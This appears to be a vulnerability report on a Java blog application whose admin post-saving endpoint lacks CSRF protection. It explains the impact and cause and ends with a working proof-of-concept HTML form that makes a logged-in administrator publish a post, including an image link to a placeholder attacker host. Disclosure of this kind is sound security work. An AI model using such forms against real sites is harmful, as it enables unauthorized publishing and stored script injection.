Description
The com.site.blog.my.core.controller.admin.BlogController#save endpoint implements no CSRF defense. By inducing an authenticated administrator to issue a cross-site request (for example by visiting a page that auto-submits a form), an attacker can publish or modify blog posts on the administrator's behalf.
Impact
Attackers can inject unauthorized content, misinformation, or malicious scripts (stored XSS) into the website's blog posts. This damages the site's credibility and can be used to redirect visitors to phishing sites.
Cause
The server accepts state-changing POST requests to /admin/blogs/save without verifying the request's origin (Origin/Referer header) and without requiring a unique, unguessable per-session token that a cross-site form could not supply.
com.site.blog.my.core.controller.admin.BlogController#save
Arbitrary blog post upload
Before the attack
Attack
After the attack
payload:
<form action="http://127.0.0.1:28083/admin/blogs/save" method="POST" enctype="application/x-www-form-urlencoded">
<input name="blogTitle" value="CSRF post" hidden>
<input name="blogSubUrl" value="" hidden>
<input name="blogCategoryId" value="1" hidden>
<input name="blogTags" value="xss,csrf" hidden>
<input name="blogContent" value="pwned" hidden>
<input name="blogCoverImage" value="http://evil.test/c.png" hidden>
<input name="blogStatus" value="1" hidden>
<input name="enableComment" value="1" hidden>
<input type="submit">
</form>